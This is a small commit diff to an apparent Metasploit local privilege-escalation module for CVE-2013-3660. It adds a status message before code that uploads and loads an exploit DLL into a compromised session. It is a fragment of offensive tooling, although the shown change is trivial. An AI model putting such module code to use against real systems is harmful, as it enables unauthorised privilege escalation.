Add a new print_status
parent
7725937461
commit
00416f3430
|
@ -131,6 +131,8 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
vprint_status("Adding the railgun stuff...")
|
vprint_status("Adding the railgun stuff...")
|
||||||
add_railgun_functions
|
add_railgun_functions
|
||||||
|
|
||||||
|
print_status("Trying to load the exploit and executing...")
|
||||||
|
|
||||||
session.core.load_library({
|
session.core.load_library({
|
||||||
"LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
|
"LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
|
||||||
"UploadLibrary" => true,
|
"UploadLibrary" => true,
|
||||||
|
|
Loading…
Reference in New Issue